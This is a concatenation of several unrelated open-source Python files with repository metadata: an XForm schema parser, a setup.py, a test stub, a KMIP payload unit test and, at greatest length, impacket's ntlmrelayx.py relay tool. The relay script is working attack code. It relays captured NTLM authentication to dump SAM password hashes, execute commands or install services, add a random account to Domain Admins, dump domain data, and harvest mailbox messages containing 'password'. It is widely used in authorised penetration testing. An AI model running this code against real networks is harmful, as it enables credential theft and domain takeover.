self.target_namespace = case_insensitive_attribute(root, 'targetNamespace')
if not self.target_namespace:
logging.error("Target namespace is not found in xsd schema")
ElementDef.__init__(self, self.target_namespace)
self.xpath = ""
self._addAttributesAndChildElements(self, root, '')
@property
def root_element(self):
'''Get the root ElementDef for this form. This will throw an
exception if there is more than one root child defined.'''
if len(self.child_elements) != 1:
raise Exception("Tried to get the single root from %s but found %s nodes"
% (self, len(self.child_elements)))
return self.child_elements[0]
@property
def domain_name(self):
"""Get the domain name, or an empty string if none found"""
if self.domain:
return self.domain.name
return ""
def get_meta_element(self):
'''Gets the meta element from the form, if it exists.
Meta is defined as a top-level child of the form with
the name "meta" (case insenitive). If no meta block
is found, this returns nothing'''
for child in self.root_element.child_elements:
if child.short_name.lower() == "meta":
return child
@classmethod
def get_meta_validation_issues(cls, element):
'''Validates an ElementDef, assuming it is a meta block. Ensures
that every field we expect to find in the meta is there, and
that there are no extra fields. Returns a dictionary of
of any errors/warnings found in the following format:
{ "missing" : [list, of, missing, expected, fields]
"duplicate" : [list, of, duplicate, fields]
"extra" : [list, of, unexpected, fields]
}
If any of these lists are empty they won't be in the dictionary,
and therefore if all are empty this method will return an empty
dictionary.
'''
missing_fields = []
extra_fields = []
duplicate_fields = []
found_fields = []
missing_fields.extend(xfm.models.Metadata.fields)
# hackily remove some stuff we no longer want to require
missing_fields.remove('formname')
missing_fields.remove('formversion')
for field in element.child_elements:
field_name = field.short_name.lower()
if field_name in missing_fields:
missing_fields.remove(field_name)
found_fields.append(field_name)
elif field_name in found_fields:
# it was already found, therefore it must be
# a duplicate
duplicate_fields.append(field_name)
else:
# it wasn't in the expected list, and wasn't a
# dupe, it must be an extra
extra_fields.append(field_name)
to_return = {}
if missing_fields:
to_return["missing"] = missing_fields
if duplicate_fields:
to_return["duplicate"] = duplicate_fields
if extra_fields:
to_return["extra"] = extra_fields
return to_return
def _addAttributesAndChildElements(self, element, input_tree, name_prefix):
for input_node in etree.ElementChildIterator(input_tree):
name = str(input_node.get('name'))
if (str(input_node.tag)).find("element") > -1:
next_name_prefix = ''
if input_node.get('maxOccurs') > 1:
child_element = ElementDef(is_repeatable=True)
child_element.populateElementFields(input_node, element.xpath, name)
else:
child_element = ElementDef()
# discard parent_name
next_name_prefix = join_if_exists( name_prefix, name )
full_name = next_name_prefix
child_element.populateElementFields(input_node, element.xpath, full_name)
element.addChild(child_element)
# theoretically, simpleType enumerations and list values can be
# defined inside of elements in practice, this isn't how things
# are currently generated in the schema generator, so we don't
# support that (yet)
self._addAttributesAndChildElements(child_element, input_node, next_name_prefix )
elif (str(input_node.tag)).find("simpleType") > -1:
simpleType = SimpleType( str(input_node.get('name')) )
child = input_node[0]
if (str(child.tag)).find("restriction") > -1:
for enum in child:
if (str(enum.tag)).find("enumeration") > -1:
simpleType.allowable_values.append( sanitize(enum.get("value")) )
elif (str(child.tag)).find("list") > -1:
multiselect_name = child.get("itemType")
if self.types[multiselect_name] is not None:
simpleType.multiselect_values = self.types[multiselect_name].allowable_values
# add new type definition
self.types[simpleType.name] = simpleType
else:
# Skip non-elements (e.g. <sequence>, <complex-type>
self._addAttributesAndChildElements(element, input_node, name_prefix)
def validate(self):
# check xmlns not none
namespace_help_text = "You should find the block in your xform labeled <instance> and " + \
"add an xmlns attribute to the first element so it looks like: " + \
'<instance><node xmlns="http://your.xmlns.goes/here">. An xmlns ' + \
"is a unique attribute that helps identify the form"
if not self.target_namespace:
raise FormDef.FormDefError("No namespace (xmlns) found in submitted form: %s" % \
self.name, FormDef.FormDefError.ERROR, namespace_help_text)
# all the forms in use today have a superset namespace they default to
# something like: http://www.w3.org/2002/xforms
if self.target_namespace.lower().find('www.w3.org') != -1:
raise FormDef.FormDefError("No unique namespace (xmlns) found in submitted form: %s" % \
self.target_namespace, FormDef.FormDefError.ERROR,
namespace_help_text)
if self.version is None or self.version.strip() == "":
raise FormDef.FormDefError("No version number found in submitted form: %s" % \
self.target_namespace, FormDef.FormDefError.WARNING)
if not self.version.strip().isdigit():
# should make this into a custom exception
raise FormDef.FormDefError("Version attribute must be an integer in xform %s but was %s" % \
(self.target_namespace, self.version), FormDef.FormDefError.WARNING)
meta_element = self.get_meta_element()
if not meta_element:
raise FormDef.FormDefError("From %s had no meta block!" % self.target_namespace, FormDef.FormDefError.WARNING)
meta_issues = FormDef.get_meta_validation_issues(meta_element)
if meta_issues:
mve = xfm.models.MetaDataValidationError(meta_issues, self.target_namespace)
# until we have a clear understanding of how meta versions will work,
# don't fail on issues that only come back with "extra" set. i.e.
# look for missing or duplicate
if mve.duplicate or mve.missing:
raise mve
else:
logging.warning("Found extra meta fields in xform %s: %s" %
(self.target_namespace, mve.extra))
# validated!
return True
def force_to_valid(self):
if self.version and self.version.strip().isdigit():
self.version = int(self.version.strip())
else:
self.version = None
if self.uiversion and self.uiversion.strip().isdigit():
self.uiversion = int(self.uiversion.strip())
else:
self.uiversion = None
def is_compatible_with(self, otherdef):
""" are these two formdef's compatible
i.e. can they share the same raw data tables
"""
return self.get_differences(otherdef).is_empty()
def get_differences(self, otherdef):
# Not sure if it's bad form to be relying on modifying this
# '_visited' variable, but this seems like the most
# straightforward solution for now
otherdef._clear_visited()
d = self._get_formdef_diff(otherdef)
d = d + self._get_children_diff(otherdef)
d.fields_added = otherdef._get_unvisited()
return d
def _get_formdef_diff(self, otherdef):
d = self._get_elementdef_diff(otherdef)
# currently, the only relevant differences to check per formdef
# are the type definitions
for i in self.types:
if i in otherdef.types:
if self.types[i] != otherdef.types[i]:
d.types_changed.append(otherdef.types[i])
# if i not in otherdef.types
# this is fine, as long as it's not referenced somewhere
# if it's references somewhere, that'll be captured as
# a field_changed diff
# we don't need to check for types added
# since this will be reported in the form of 'field added' or 'field changed'
return d
class FormDefError(Exception):
"""Error from FormDef Processing. Allows for specification
of an additional 'category' which can separate true errors
from warning-type errors."""
ERROR = 1
WARNING = 2
def __init__(self, message, category, help_text=""):
super(FormDef.FormDefError, self).__init__(message)
self.category = category
self.help_text = help_text
class SimpleType(object):
""" Stores type definition for simple types """
def __init__(self, name=''):
self.allowable_values = []
self.multiselect_values = []
self.name = name
def __ne__(self, other):
""" case-insensitive comparison """
# we do case-sensitive comparison, since xml is case-sensitive
return not (self == other)
def __eq__(self, other):
""" case-insensitive comparison """
# we do case-sensitive comparison, since xml is case-sensitive
return (self.multiselect_values == other.multiselect_values) and \
(self.allowable_values == other.allowable_values) and \
(self.name == other.name)
""" we may want case-insensitive comparison later, which would be:
return ([i.lower() for i in self.multiselect_values] == \
[j.lower() for j in other.multiselect_values]) and \
([i.lower() for i in self.allowable_values] == \
[j.lower() for j in other.allowable_values]) and \
(self.name.lower() == other.name.lower())
"""
class Differences(object):
""" Data structure to represent the differences between this and another formdef """
def __init__(self):
self.otherdef = None
self.fields_added = []
self.fields_removed = []
self.fields_changed = []
# types added is not required for now, since it will also
# be caught by fields_changed or fields_added
self.types_changed = []
def __add__(self, other):
d = Differences()
d.fields_added = self.fields_added + other.fields_added
d.fields_removed = self.fields_removed + other.fields_removed
d.fields_changed = self.fields_changed + other.fields_changed
d.types_changed = self.types_changed + other.types_changed
return d
def is_empty(self):
'''Return whether this is meaningfully empty (i.e. representing
no differences'''
return not (self.fields_added or self.fields_changed or \
self.fields_removed or self.types_changed)
def __unicode__(self):
if self.is_empty():
return "No differences"
else:
attrs = ["fields_added", "fields_removed", "fields_changed", "types_changed"]
msgs = [self._display_string(attr) for attr in attrs]
return "\n".join([display for display in msgs if display])
def __str__(self):
return unicode(self).encode('utf-8')
def _display_string(self, attr):
if hasattr(self, attr):
vals = getattr(self, attr)
if vals:
val_strs = [str(val) for val in vals]
return "%s %s: %s" % (len(val_strs),
attr.replace("_", " "),
",".join(val_strs))
return "" | {
"content_hash": "654e89340e60065fced2e553535ef844",
"timestamp": "",
"source": "github",
"line_count": 497,
"max_line_length": 122,
"avg_line_length": 43.06438631790744,
"alnum_prop": 0.5696397701256833,
"repo_name": "icomms/wqmanager",
"id": "7df954061c5e2b02993591e439f2767565ba2361",
"size": "21403",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/xformmanager/xformdef.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "793418"
},
{
"name": "PHP",
"bytes": "2863"
},
{
"name": "Python",
"bytes": "3735941"
},
{
"name": "Shell",
"bytes": "383"
}
],
"symlink_target": ""
} |
import os
from setuptools import setup, find_packages
def read(fname):
buf = open(os.path.join(os.path.dirname(__file__), fname), 'rb').read()
return buf.decode('utf8')
setup(name='mtgjson',
version='0.4.1.dev1',
description='A python library for working with data from mtgjson.com.',
long_description=read('README.rst'),
author='Marc Brinkmann',
author_email='[email protected]',
url='http://github.com/mbr/pymtgjson',
license='MIT',
packages=find_packages(exclude=['tests']),
install_requires=['docutils', 'requests', 'six'],
classifiers=[
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
])
| {
"content_hash": "d7f529d6c659333197bc118bb4151c48",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 77,
"avg_line_length": 30.208333333333332,
"alnum_prop": 0.6220689655172413,
"repo_name": "mbr/pymtgjson",
"id": "29b54ca9751c8b6920b8fac45349e7e24d66ec8d",
"size": "772",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10717"
}
],
"symlink_target": ""
} |
from sklearn2sql_heroku.tests.regression import generic as reg_gen
reg_gen.test_model("SVR_poly" , "freidman1" , "sqlite")
| {
"content_hash": "4328e0ff8f96f94cf3a9270e9e094d00",
"timestamp": "",
"source": "github",
"line_count": 4,
"max_line_length": 66,
"avg_line_length": 31.25,
"alnum_prop": 0.752,
"repo_name": "antoinecarme/sklearn2sql_heroku",
"id": "6f32db4cc1fd39577c786d93061d8f9e17356a46",
"size": "125",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/regression/freidman1/ws_freidman1_SVR_poly_sqlite_code_gen.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "507043"
},
{
"name": "Procfile",
"bytes": "37"
},
{
"name": "Python",
"bytes": "1021137"
},
{
"name": "R",
"bytes": "2521"
}
],
"symlink_target": ""
} |
import argparse
import sys
import thread
import logging
import random
import string
import re
import os
from threading import Thread
from impacket import version, smb3, smb
from impacket.examples import logger
from impacket.examples import serviceinstall
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.utils.tcpshell import TcpShell
from impacket.smbconnection import SMBConnection
from smbclient import MiniImpacketShell
class SMBAttack(Thread):
def __init__(self, config, SMBClient, username):
Thread.__init__(self)
self.daemon = True
if isinstance(SMBClient, smb.SMB) or isinstance(SMBClient, smb3.SMB3):
self.__SMBConnection = SMBConnection(existingConnection = SMBClient)
else:
self.__SMBConnection = SMBClient
self.config = config
self.__answerTMP = ''
if self.config.interactive:
#Launch locally listening interactive shell
self.tcpshell = TcpShell()
else:
self.tcpshell = None
if self.config.exeFile is not None:
self.installService = serviceinstall.ServiceInstall(SMBClient, self.config.exeFile)
def __answer(self, data):
self.__answerTMP += data
def run(self):
# Here PUT YOUR CODE!
if self.tcpshell is not None:
logging.info('Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port)
#Start listening and launch interactive shell
self.tcpshell.listen()
self.shell = MiniImpacketShell(self.__SMBConnection,self.tcpshell.socketfile)
self.shell.cmdloop()
return
if self.config.exeFile is not None:
result = self.installService.install()
if result is True:
logging.info("Service Installed.. CONNECT!")
self.installService.uninstall()
else:
from impacket.examples.secretsdump import RemoteOperations, SAMHashes
samHashes = None
try:
# We have to add some flags just in case the original client did not
# Why? needed for avoiding INVALID_PARAMETER
flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
flags2 |= smb.SMB.FLAGS2_LONG_NAMES
self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
remoteOps = RemoteOperations(self.__SMBConnection, False)
remoteOps.enableRegistry()
except Exception, e:
# Something wen't wrong, most probably we don't have access as admin. aborting
logging.error(str(e))
return
try:
if self.config.command is not None:
remoteOps._RemoteOperations__executeRemote(self.config.command)
logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
self.__answerTMP = ''
self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
print self.__answerTMP.decode(self.config.encoding, 'replace')
else:
bootKey = remoteOps.getBootKey()
remoteOps._RemoteOperations__serviceDeleted = True
samFileName = remoteOps.saveSAM()
samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
samHashes.dump()
samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
except Exception, e:
logging.error(str(e))
finally:
if samHashes is not None:
samHashes.finish()
if remoteOps is not None:
remoteOps.finish()
#Define global variables to prevent dumping the domain twice
dumpedDomain = False
addedDomainAdmin = False
class LDAPAttack(Thread):
def __init__(self, config, LDAPClient, username):
Thread.__init__(self)
self.daemon = True
#Import it here because non-standard dependency
self.ldapdomaindump = __import__('ldapdomaindump')
self.client = LDAPClient
self.username = username.decode('utf-16le')
#Global config
self.config = config
def addDA(self, domainDumper):
global addedDomainAdmin
if addedDomainAdmin:
logging.error('DA already added. Refusing to add another')
return
#Random password
newPassword = ''.join(random.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(15))
#Random username
newUser = ''.join(random.choice(string.ascii_letters) for _ in range(10))
ucd = {
'objectCategory': 'CN=Person,CN=Schema,CN=Configuration,%s' % domainDumper.root,
'distinguishedName': 'CN=%s,CN=Users,%s' % (newUser,domainDumper.root),
'cn': newUser,
'sn': newUser,
'givenName': newUser,
'displayName': newUser,
'name': newUser,
'userAccountControl': 512,
'accountExpires': 0,
'sAMAccountName': newUser,
'unicodePwd': '"{}"'.format(newPassword).encode('utf-16-le')
}
res = self.client.connection.add('CN=%s,CN=Users,%s' % (newUser,domainDumper.root),['top','person','organizationalPerson','user'],ucd)
if not res:
logging.error('Failed to add a new user: %s' % str(self.client.connection.result))
else:
logging.info('Adding new user with username: %s and password: %s result: OK' % (newUser,newPassword))
domainsid = domainDumper.getRootSid()
dagroupdn = domainDumper.getDAGroupDN(domainsid)
res = self.client.connection.modify(dagroupdn, {
'member': [(self.client.MODIFY_ADD, ['CN=%s,CN=Users,%s' % (newUser, domainDumper.root)])]})
if res:
logging.info('Adding user: %s to group Domain Admins result: OK' % newUser)
logging.info('Domain Admin privileges aquired, shutting down...')
addedDomainAdmin = True
thread.interrupt_main()
else:
logging.error('Failed to add user to Domain Admins group: %s' % str(self.client.connection.result))
def run(self):
global dumpedDomain
#Set up a default config
domainDumpConfig = self.ldapdomaindump.domainDumpConfig()
#Change the output directory to configured rootdir
domainDumpConfig.basepath = self.config.lootdir
#Create new dumper object
domainDumper = self.ldapdomaindump.domainDumper(self.client.server, self.client.connection, domainDumpConfig)
if domainDumper.isDomainAdmin(self.username):
logging.info('User is a Domain Admin!')
if self.config.addda:
if 'ldaps' in self.client.target:
self.addDA(domainDumper)
else:
logging.error('Connection to LDAP server does not use LDAPS, to enable adding a DA specify the target with ldaps:// instead of ldap://')
else:
logging.info('Not adding a new Domain Admin because of configuration options')
else:
logging.info('User is not a Domain Admin')
if not dumpedDomain and self.config.dumpdomain:
#do this before the dump is complete because of the time this can take
dumpedDomain = True
logging.info('Dumping domain info for first time')
domainDumper.domainDump()
logging.info('Domain info dumped into lootdir!')
class HTTPAttack(Thread):
def __init__(self, config, HTTPClient, username):
Thread.__init__(self)
self.daemon = True
self.config = config
self.client = HTTPClient
self.username = username
def run(self):
#Default action: Dump requested page to file, named username-targetname.html
#You can also request any page on the server via self.client.session,
#for example with:
#result = self.client.session.get('http://secretserver/secretpage.html')
#print result.content
#Remove protocol from target name
safeTargetName = self.client.target.replace('http://','').replace('https://','')
#Replace any special chars in the target name
safeTargetName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', safeTargetName)
#Combine username with filename
fileName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', self.username.decode('utf-16-le')) + '-' + safeTargetName + '.html'
#Write it to the file
with open(os.path.join(self.config.lootdir,fileName),'w') as of:
of.write(self.client.lastresult)
class IMAPAttack(Thread):
def __init__(self, config, IMAPClient, username):
Thread.__init__(self)
self.daemon = True
self.config = config
self.client = IMAPClient
self.username = username
def run(self):
#Default action: Search the INBOX for messages with "password" in the header or body
targetBox = self.config.mailbox
result, data = self.client.session.select(targetBox,True) #True indicates readonly
if result != 'OK':
logging.error('Could not open mailbox %s: %s' % (targetBox,data))
logging.info('Opening mailbox INBOX')
targetBox = 'INBOX'
result, data = self.client.session.select(targetBox,True) #True indicates readonly
inboxCount = int(data[0])
logging.info('Found %s messages in mailbox %s' % (inboxCount,targetBox))
#If we should not dump all, search for the keyword
if not self.config.dump_all:
result, rawdata = self.client.session.search(None,'OR','SUBJECT','"%s"' % self.config.keyword,'BODY','"%s"' % self.config.keyword)
#Check if search worked
if result != 'OK':
logging.error('Search failed: %s' % rawdata)
return
dumpMessages = []
#message IDs are separated by spaces
for msgs in rawdata:
dumpMessages += msgs.split(' ')
if self.config.dump_max != 0 and len(dumpMessages) > self.config.dump_max:
dumpMessages = dumpMessages[:self.config.dump_max]
else:
#Dump all mails, up to the maximum number configured
if self.config.dump_max == 0 or self.config.dump_max > inboxCount:
dumpMessages = range(1,inboxCount+1)
else:
dumpMessages = range(1,self.config.dump_max+1)
numMsgs = len(dumpMessages)
if numMsgs == 0:
logging.info('No messages were found containing the search keywords')
else:
logging.info('Dumping %d messages found by search for "%s"' % (numMsgs,self.config.keyword))
for i,msgIndex in enumerate(dumpMessages):
#Fetch the message
result, rawMessage = self.client.session.fetch(msgIndex, '(RFC822)')
if result != 'OK':
logging.error('Could not fetch message with index %s: %s' % (msgIndex,rawMessage))
continue
#Replace any special chars in the mailbox name and username
mailboxName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', targetBox)
textUserName = re.sub(r'[^a-zA-Z0-9_\-\.]+', '_', self.username.decode('utf-16-le'))
#Combine username with mailboxname and mail number
fileName = 'mail_' + textUserName + '-' + mailboxName + '_' + str(msgIndex) + '.eml'
#Write it to the file
with open(os.path.join(self.config.lootdir,fileName),'w') as of:
of.write(rawMessage[0][1])
logging.info('Done fetching message %d/%d' % (i+1,numMsgs))
#Close connection cleanly
self.client.session.logout()
class MSSQLAttack(Thread):
def __init__(self, config, MSSQLClient):
Thread.__init__(self)
self.config = config
self.client = MSSQLClient
def run(self):
if self.config.queries is None:
logging.error('No SQL queries specified for MSSQL relay!')
else:
for query in self.config.queries:
logging.info('Executing SQL: %s' % query)
self.client.sql_query(query)
self.client.printReplies()
self.client.printRows()
# Process command-line arguments.
if __name__ == '__main__':
RELAY_SERVERS = ( SMBRelayServer, HTTPRelayServer )
ATTACKS = { 'SMB': SMBAttack, 'LDAP': LDAPAttack, 'HTTP': HTTPAttack, 'MSSQL': MSSQLAttack, 'IMAP': IMAPAttack}
# Init the example's logger theme
logger.init()
print version.BANNER
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help='Target to relay the credentials to, '
'can be an IP, hostname or URL like smb://server:445 If unspecified, it will relay back to the client')
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient/mssqlclient console instead'
'of executing a command after a successful relay. This console will listen locally on a '
' tcp port and can be reached with for example netcat.')
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute wmiexec.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-machine-account', action='store', required=False, help='Domain machine account to use when '
'interacting with the domain to grab a session key for signing, format is domain/machine_name')
parser.add_argument('-machine-hashes', action="store", metavar = "LMHASH:NTHASH", help='Domain machine hashes, format is LMHASH:NTHASH')
parser.add_argument('-domain', action="store", help='Domain FQDN or IP to connect using NETLOGON')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
'directory).')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
'(can specify multiple)')
#HTTP options (not in use for now)
# httpoptions = parser.add_argument_group("HTTP client options")
# httpoptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
# '(can specify multiple)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
try:
options = parser.parse_args()
except Exception, e:
logging.error(str(e))
sys.exit(1)
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singletarget=options.target)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetlistfile=options.tf)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump,options.no_da)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword,options.mailbox,options.all,options.imap_max)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
#SMB server at the moment does not properly store active targets so selecting them randomly will cause issues
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
if options.machine_account is not None and options.machine_hashes is not None and options.domain is not None:
c.setDomainAccount( options.machine_account, options.machine_hashes, options.domain)
elif (options.machine_account is None and options.machine_hashes is None and options.domain is None) is False:
logging.error("You must specify machine-account/hashes/domain all together!")
sys.exit(1)
s = server(c)
s.start()
print ""
logging.info("Servers started, waiting for connections")
while True:
try:
sys.stdin.read()
except KeyboardInterrupt:
sys.exit(1)
else:
pass
| {
"content_hash": "42dbf07e8a1c963cbebee6345d21a3d4",
"timestamp": "",
"source": "github",
"line_count": 447,
"max_line_length": 160,
"avg_line_length": 48.868008948545864,
"alnum_prop": 0.6111060245376305,
"repo_name": "tholum/PiBunny",
"id": "26f4463c8cdf986ca949be19793bd534775516da",
"size": "23415",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "system.d/library/tools_installer/tools_to_install/impacket/examples/ntlmrelayx.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "3527"
},
{
"name": "HTML",
"bytes": "195334"
},
{
"name": "JavaScript",
"bytes": "1156309"
},
{
"name": "PowerShell",
"bytes": "5359"
},
{
"name": "Python",
"bytes": "6368546"
},
{
"name": "Shell",
"bytes": "40720"
},
{
"name": "Visual Basic",
"bytes": "5660"
}
],
"symlink_target": ""
} |
import testtools
from kmip.core import enums
from kmip.core import exceptions
from kmip.core import objects
from kmip.core import primitives
from kmip.core import utils
from kmip.core.messages import payloads
class TestSetAttributeRequestPayload(testtools.TestCase):
"""
A unit test suite for the SetAttribute request payload.
"""
def setUp(self):
super(TestSetAttributeRequestPayload, self).setUp()
# This encoding was adapted from test case 3.1.4-7 from the KMIP 1.1
# test suite. It was modified to reflect the new SetAttribute operation
# in KMIP 2.0. The new attribute was manually added.
#
# This encoding matches the following set of values.
# Request Payload
# Unique Identifier - b4faee10-aa2a-4446-8ad4-0881f3422959
# New Attribute
# Cryptographic Algorithm - AES
self.full_encoding = utils.BytearrayStream(
b'\x42\x00\x79\x01\x00\x00\x00\x48'
b'\x42\x00\x94\x07\x00\x00\x00\x24'
b'\x62\x34\x66\x61\x65\x65\x31\x30\x2D\x61\x61\x32\x61\x2D\x34\x34'
b'\x34\x36\x2D\x38\x61\x64\x34\x2D\x30\x38\x38\x31\x66\x33\x34\x32'
b'\x32\x39\x35\x39\x00\x00\x00\x00'
b'\x42\x01\x3D\x01\x00\x00\x00\x10'
b'\x42\x00\x28\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
)
# This encoding was adapted from test case 3.1.4-7 from the KMIP 1.1
# test suite. It was modified to reflect the new SetAttribute operation
# in KMIP 2.0. The new attribute was manually added and the unique
# identifier was removed.
#
# This encoding matches the following set of values.
# Request Payload
# New Attribute
# Cryptographic Algorithm - AES
self.no_unique_identifier_encoding = utils.BytearrayStream(
b'\x42\x00\x79\x01\x00\x00\x00\x18'
b'\x42\x01\x3D\x01\x00\x00\x00\x10'
b'\x42\x00\x28\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x00\x00'
)
self.empty_encoding = utils.BytearrayStream(
b'\x42\x00\x79\x01\x00\x00\x00\x00'
)
def tearDown(self):
super(TestSetAttributeRequestPayload, self).tearDown()
def test_invalid_unique_identifier(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the unique identifier of a SetAttribute request payload.
"""
kwargs = {"unique_identifier": 0}
self.assertRaisesRegex(
TypeError,
"The unique identifier must be a string.",
payloads.SetAttributeRequestPayload,
**kwargs
)
args = (
payloads.SetAttributeRequestPayload(),
"unique_identifier",
0
)
self.assertRaisesRegex(
TypeError,
"The unique identifier must be a string.",
setattr,
*args
)
def test_invalid_new_attribute(self):
"""
Test that a TypeError is raised when an invalid value is used to set
the new attribute of a SetAttribute request payload.
"""
kwargs = {"new_attribute": "invalid"}
self.assertRaisesRegex(
TypeError,
"The new attribute must be a NewAttribute object.",
payloads.SetAttributeRequestPayload,
**kwargs
)
args = (
payloads.SetAttributeRequestPayload(),
"new_attribute",
"invalid"
)
self.assertRaisesRegex(
TypeError,
"The new attribute must be a NewAttribute object.",
setattr,
*args
)
def test_read(self):
"""
Test that a SetAttribute request payload can be read from a buffer.
"""
payload = payloads.SetAttributeRequestPayload()
self.assertIsNone(payload.unique_identifier)
self.assertIsNone(payload.new_attribute)
payload.read(self.full_encoding)
self.assertEqual(
"b4faee10-aa2a-4446-8ad4-0881f3422959",
payload.unique_identifier
)
self.assertEqual(
objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
payload.new_attribute
)
def test_read_no_unique_identifier(self):
"""
Test that a SetAttribute request payload can be read from a buffer
even when the encoding is missing the unique identifier field.
"""
payload = payloads.SetAttributeRequestPayload()
self.assertIsNone(payload.unique_identifier)
self.assertIsNone(payload.new_attribute)
payload.read(self.no_unique_identifier_encoding)
self.assertIsNone(payload.unique_identifier)
self.assertEqual(
objects.NewAttribute(
attribute=primitives.Enumeration(
enums.CryptographicAlgorithm,
enums.CryptographicAlgorithm.AES,
enums.Tags.CRYPTOGRAPHIC_ALGORITHM
)
),
payload.new_attribute
)
def test_read_no_new_attribute(self):
"""
Test that an InvalidKmipEncoding error is raised when an invalid
encoding containing no encoded new attribute is used to decode
a SetAttribute request payload.
"""
payload = payloads.SetAttributeRequestPayload()
